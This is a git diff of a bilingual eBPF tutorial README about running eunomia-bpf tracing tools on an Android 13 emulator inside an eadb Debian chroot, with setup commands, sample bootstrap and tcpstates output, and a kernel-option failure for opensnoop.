/data/eadb` - + `mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz` - + `rm -r /data/local/tmp/assets` + + `mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz`+ `rm -r /data/local/tmp/assets` + `chmod +x /data/eadb/device-*` + `/data/eadb/device-unpack` + `/data/eadb/run /data/eadb/debian` -至此,测试 eBPF 所需的 Linux 环境已经构建完毕。此外,在 Android shell 中(未进入 debian 时)可以通过 `zcat /proc/config.gz` 并配合 `grep` 查看内核编译选项。 +At this point, the Linux environment required for testing eBPF has been set up. In addition, in the Android shell (before entering debian), you can use `zcat /proc/config.gz` in conjunction with `grep` to view kernel compilation options. ->目前,eadb 打包的 debian 环境存在 libc 版本低,缺少的工具依赖较多等情况;并且由于内核编译选项不同,一些 eBPF 功能可能也无法使用。 +>Currently, the debian environment packaged by eadb has a low version of libc and lacks many tool dependencies. Additionally, due to different kernel compilation options, some eBPF features may not be available. -## 工具构建 +## Build Tools -在 debian 环境中将 eunomia-bpf 仓库 clone 到本地,具体的构建过程,可以参考仓库的 [build.md](https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md)。在本次测试中,笔者选用了 `ecc` 编译生成 `package.json` 的方式,该工具的构建和使用方式请参考[仓库页面](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler)。 +Clone the eunomia-bpf repository into the local debian environment. For the specific build process, refer to the repository's [build.md](https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md). In this test, I used the `ecc` compilation method to generate the `package.json`. Please refer to the [repository page](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler) for the build and usage instructions for this tool. ->在构建过程中,可能需要自行安装包括但不限于 `curl`,`pkg-config`,`libssl-dev` 等工具。 +>During the build process, you may need to manually install tools such as `curl`, `pkg-config`, `libssl-dev`, etc. -## 结果 +## Results -有部分 eBPF 程序可以成功在 Android 上运行,但也会有部分应用因为种种原因无法成功被执行。 +Some eBPF programs can be successfully executed on Android, but there are also some applications that cannot be executed successfully for various reasons. -### 成功案例 +### Success Cases #### [bootstrap](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap) -运行输出如下: +The output of running is as follows: ```console TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT @@ -77,7 +76,7 @@ TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT #### [tcpstates](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates) -开始监测后在 Linux 环境中通过 `wget` 下载 Web 页面: +After starting monitoring, download a web page using `wget` in the Linux environment: ```console TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK @@ -90,7 +89,7 @@ TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE F 09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet ``` -开始检测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面: +Start the detection and open the Chrome browser in the Android Studio simulation interface to access the Baidu page: ```console TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK @@ -100,8 +99,7 @@ TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE F 07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService 07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService 07:46:58 0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService -07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService -07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg +07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService".07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg 07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService 07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService 07:46:59 0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0 @@ -116,11 +114,7 @@ TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE F 07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet ``` -### 一些可能的报错原因 - -#### [opensnoop](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/opensnoop) - -例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错: +Note: some error messages may appear in the Android shell during the test: ```console libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory @@ -130,25 +124,27 @@ failed to attach skeleton Error: BpfError("load and attach ebpf program failed") ``` -后经查看发现内核未开启 `CONFIG_FTRACE_SYSCALLS` 选项,导致无法使用 syscalls 的 tracepoint。 +Later, after investigation, it was found that the kernel did not enable the `CONFIG_FTRACE_SYSCALLS` option, which resulted in the inability to use the tracepoint of syscalls. -## 总结 +## Summary -在 Android shell 中查看内核编译选项可以发现 `CONFIG_DEBUG_INFO_BTF` 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 `exec` 族函数的执行和 tcp 连接的状态。 +The `CONFIG_DEBUG_INFO_BTF` option is enabled by default when viewing the kernel compilation options in the Android shell. Based on this, the examples provided by the eunomia-bpf project already have some successful cases, such as monitoring the execution of the `exec` family of functions and the status of TCP connections. -对于无法运行的一些,原因主要是以下两个方面: +For some cases that cannot run, the reasons are mainly the following: -1. 内核编译选项未支持相关 eBPF 功能; -2. eadb 打包的 Linux 环境较弱,缺乏必须依赖; +1. The kernel compilation options do not support the relevant eBPF functionality; +2. The Linux environment packaged by eadb is weak and lacks necessary dependencies; -目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。 +Currently, using eBPF tools in the Android system still requires building a complete Linux runtime environment. However, the Android kernel itself has comprehensive support for eBPF. This test proves that higher versions of the Android kernel support BTF debugging information and CO-RE dependent eBPF programs. -Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。 +The development of eBPF tools in the Android system requires the addition of official new features. Currently, it seems that using eBPF tools directly through an Android app requires a lot of effort. At the same time, since eBPF tools require root privileges, ordinary Android users will encounter more difficulties in using them. -如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. -## 参考 +## Reference -[^Google]: -[^WeiShu]: -[^SeeFlowerX]: ++ [Google android docs](https://source.android.google.cn/docs/core/architecture/kernel/bpf) ++ [weixin WeiShu](https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA) ++ [SeeFlowerX](https://blog.seeflower.dev/archives/138/>) + +> The original link of this article: diff --git a/src/22-android/README.zh.md b/src/22-android/README.zh.md new file mode 100644 index 0000000..07d7114 --- /dev/null +++ b/src/22-android/README.zh.md @@ -0,0 +1,154 @@ +# 在 Android 上使用 eBPF 程序 + +> 本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。 +> 测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。 + +## 背景 + +截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行[^WeiShu]。 + +虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 `Android.bp` 以将 eBPF 程序随整个系统一同构建并挂载的方案[^Google],也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。 + +目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如: + ++ SeeFlowerX: ++ evilpan: + +其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。 + +事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。 + +> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。 + +## 测试环境 + ++ Android Emulator(Android Studio Flamingo | 2022.2.1) ++ AVD: Pixel 6 ++ Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) + +## 环境搭建[^SeeFlowerX] + +1. 从 [eadb 仓库](https://github.com/tiann/eadb) 的 releases 页面获取 `debianfs-amd64-full.tar.gz` 作为 Linux 环境的 rootfs,同时还需要获取该项目的 `assets` 目录来构建环境; +2. 从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device; +3. 通过 Android Studio SDK 的 adb 工具将 `debianfs-amd64-full.tar.gz` 和 `assets` 目录推送到 AVD 中: + + `./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz` + + `./adb push assets /data/local/tmp/assets` +4. 通过 adb 进入 Android shell 环境并获取 root 权限: + + `./adb shell` + + `su` +5. 在 Android shell 中构建并进入 debian 环境: + + `mkdir -p /data/eadb` + + `mv /data/local/tmp/assets/* /data/eadb` + + `mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz` + + `rm -r /data/local/tmp/assets` + + `chmod +x /data/eadb/device-*` + + `/data/eadb/device-unpack` + + `/data/eadb/run /data/eadb/debian` + +至此,测试 eBPF 所需的 Linux 环境已经构建完毕。此外,在 Android shell 中(未进入 debian 时)可以通过 `zcat /proc/config.gz` 并配合 `grep` 查看内核编译选项。 + +>目前,eadb 打包的 debian 环境存在 libc 版本低,缺少的工具依赖较多等情况;并且由于内核编译选项不同,一些 eBPF 功能可能也无法使用。 + +## 工具构建 + +在 debian 环境中将 eunomia-bpf 仓库 clone 到本地,具体的构建过程,可以参考仓库的 [build.md](https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md)。在本次测试中,笔者选用了 `ecc` 编译生成 `package.json` 的方式,该工具的构建和使用方式请参考[仓库页面](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler)。 + +>在构建过程中,可能需要自行安装包括但不限于 `curl`,`pkg-config`,`libssl-dev` 等工具。 + +## 结果 + +有部分 eBPF 程序可以成功在 Android 上运行,但也会有部分应用因为种种原因无法成功被执行。 + +### 成功案例 + +#### [bootstrap](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap) + +运行输出如下: + +```console +TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT +09:09:19 10217 479 0 0 sh /system/bin/sh 0 +09:09:19 10217 479 0 0 ps /system/bin/ps 0 +09:09:19 10217 479 0 54352100 ps 1 +09:09:21 10219 479 0 0 sh /system/bin/sh 0 +09:09:21 10219 479 0 0 ps /system/bin/ps 0 +09:09:21 10219 479 0 44260900 ps 1 +``` + +#### [tcpstates](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates) + +开始监测后在 Linux 环境中通过 `wget` 下载 Web 页面: + +```console +TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK +09:07:46 0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget +09:07:46 0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0 +09:07:46 0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget +09:07:46 0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0 +09:07:46 0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0 +09:07:47 0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet +09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet +``` + +开始检测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面: + +```console +TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK +07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService +07:46:58 0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService +07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService +07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService +07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService +07:46:58 0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService +07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService +07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg +07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService +07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService +07:46:59 0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0 +07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService +07:47:00 0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0 +07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService +07:47:00 0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService +07:47:00 0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11 +07:47:00 0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService +07:47:00 0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService +07:47:00 0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService +07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet +``` + +### 一些可能的报错原因 + +#### [opensnoop](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/opensnoop) + +例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错: + +```console +libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2 +failed to attach skeleton +Error: BpfError("load and attach ebpf program failed") +``` + +后经查看发现内核未开启 `CONFIG_FTRACE_SYSCALLS` 选项,导致无法使用 syscalls 的 tracepoint。 + +## 总结 + +在 Android shell 中查看内核编译选项可以发现 `CONFIG_DEBUG_INFO_BTF` 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 `exec` 族函数的执行和 tcp 连接的状态。 + +对于无法运行的一些,原因主要是以下两个方面: + +1. 内核编译选项未支持相关 eBPF 功能; +2. eadb 打包的 Linux 环境较弱,缺乏必须依赖; + +目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。 + +Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。 + +如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +## 参考 + +[^Google]: +[^WeiShu]: +[^SeeFlowerX]: diff --git a/src/22-android/README_en.md b/src/22-android/README_en.md deleted file mode 100644 index f1f660b..0000000 --- a/src/22-android/README_en.md +++ /dev/null @@ -1,150 +0,0 @@ -# eBPF Tutorial by Example: Using eBPF Programs on Android - -> This article mainly documents the author's exploration process, results, and issues encountered while testing the level of support for CO-RE technology based on the libbpf library on high version Android kernels in the Android Studio Emulator. -> The test was conducted by building a Debian environment in the Android Shell environment and attempting to build the eunomia-bpf toolchain and run its test cases based on this. - -## Background - -As of now (2023-04), Android has not provided good support for dynamic loading of eBPF programs. Both the compiler distribution scheme represented by bcc and the CO-RE scheme based on btf and libbpf rely heavily on Linux environment support and cannot run well on the Android system.[^WeiShu] - -However, there have been some successful cases of trying eBPF on the Android platform. In addition to the solution provided by Google to modify `Android.bp` to build and mount eBPF programs with the entire system[^Google], some people have proposed building a Linux environment based on the Android kernel and running the eBPF toolchain using this approach, and have developed related tools. - -Currently available information mostly focuses on the testing of bcc and bpftrace toolchains based on the adeb/eadb sandbox built on the Android kernel, with less testing work on the CO-RE scheme. There is more reference material available for using the bcc tool on Android, such as: - -+ SeeFlowerX: -+ evilpan: - -The main idea is to use chroot to run a Debian image on the Android kernel and build the entire bcc toolchain within it in order to use eBPF tools. The same principle applies to using bpftrace. - -In fact, higher versions of the Android kernel already support the btf option, which means that the emerging CO-RE technology in the eBPF field should also be applicable to Linux systems based on the Android kernel. This article will test and run eunomia-bpf in the emulator environment based on this. - -> [eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) is an open-source project that combines libbpf and WebAssembly technology, aiming to simplify the writing, compilation, and deployment of eBPF programs. This project can be seen as a practical way of implementing CO-RE, with libbpf as its core dependency. It is believed that the testing work of eunomia-bpf can provide reference for other CO-RE schemes. - -## Test Environment - -+ Android Emulator (Android Studio Flamingo | 2022.2.1) -+ AVD: Pixel 6 -+ Android Image: Tiramisu Android 13.0 x86_64 (5.15.41-android13-8-00055-g4f5025129fe8-ab8949913) - -## Environment Setup[^SeeFlowerX] - -1. Obtain `debianfs-amd64-full.tar.gz` from the releases page of the [eadb repository](https://github.com/tiann/eadb) as the rootfs of the Linux environment. Also, get the `assets` directory from this project to build the environment. -2. Configure and start the Android Virtual Device in the Android Studio Device Manager. -3. Push `debianfs-amd64-full.tar.gz` and the `assets` directory to the AVD using the adb tool from the Android Studio SDK: - + `./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz` - + `./adb push assets /data/local/tmp/assets` -4. Use adb to enter the Android shell environment and obtain root permissions: - + `./adb shell` - + `su` -5. Build and enter the debian environment in the Android shell: - + `mkdir -p /data/eadb` - + `mv /data/local/tmp/assets/* /data/eadb` - + `mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz`+ `rm -r /data/local/tmp/assets` - + `chmod +x /data/eadb/device-*` - + `/data/eadb/device-unpack` - + `/data/eadb/run /data/eadb/debian` - -At this point, the Linux environment required for testing eBPF has been set up. In addition, in the Android shell (before entering debian), you can use `zcat /proc/config.gz` in conjunction with `grep` to view kernel compilation options. - ->Currently, the debian environment packaged by eadb has a low version of libc and lacks many tool dependencies. Additionally, due to different kernel compilation options, some eBPF features may not be available. - -## Build Tools - -Clone the eunomia-bpf repository into the local debian environment. For the specific build process, refer to the repository's [build.md](https://github.com/eunomia-bpf/eunomia-bpf/blob/master/documents/build.md). In this test, I used the `ecc` compilation method to generate the `package.json`. Please refer to the [repository page](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/compiler) for the build and usage instructions for this tool. - ->During the build process, you may need to manually install tools such as `curl`, `pkg-config`, `libssl-dev`, etc. - -## Results - -Some eBPF programs can be successfully executed on Android, but there are also some applications that cannot be executed successfully for various reasons. - -### Success Cases - -#### [bootstrap](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/bootstrap) - -The output of running is as follows: - -```console -TIME PID PPID EXIT_CODE DURATION_NS COMM FILENAME EXIT_EVENT -09:09:19 10217 479 0 0 sh /system/bin/sh 0 -09:09:19 10217 479 0 0 ps /system/bin/ps 0 -09:09:19 10217 479 0 54352100 ps 1 -09:09:21 10219 479 0 0 sh /system/bin/sh 0 -09:09:21 10219 479 0 0 ps /system/bin/ps 0 -09:09:21 10219 479 0 44260900 ps 1 -``` - -#### [tcpstates](https://github.com/eunomia-bpf/eunomia-bpf/tree/master/examples/bpftools/tcpstates) - -After starting monitoring, download a web page using `wget` in the Linux environment: - -```console -TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK -09:07:46 0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget -09:07:46 0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0 -09:07:46 0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget -09:07:46 0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0 -09:07:46 0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0 -09:07:47 0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet -09:07:47 0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet -``` - -Start the detection and open the Chrome browser in the Android Studio simulation interface to access the Baidu page: - -```console -TIME SADDR DADDR SKADDR TS_US DELTA_US PID OLDSTATE NEWSTATE FAMILY SPORT DPORT TASK -07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService -07:46:58 0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService -07:46:58 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService -07:46:58 0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService -07:46:58 0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService -07:46:58 0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService -07:46:58 0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService".07:46:59 0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg -07:46:59 0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService -07:46:59 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService -07:46:59 0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0 -07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService -07:47:00 0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0 -07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService -07:47:00 0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService -07:47:00 0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11 -07:47:00 0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService -07:47:00 0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService -07:47:00 0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService -07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet -``` - -Note: some error messages may appear in the Android shell during the test: - -```console -libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory -libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory -libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2 -failed to attach skeleton -Error: BpfError("load and attach ebpf program failed") -``` - -Later, after investigation, it was found that the kernel did not enable the `CONFIG_FTRACE_SYSCALLS` option, which resulted in the inability to use the tracepoint of syscalls. - -## Summary - -The `CONFIG_DEBUG_INFO_BTF` option is enabled by default when viewing the kernel compilation options in the Android shell. Based on this, the examples provided by the eunomia-bpf project already have some successful cases, such as monitoring the execution of the `exec` family of 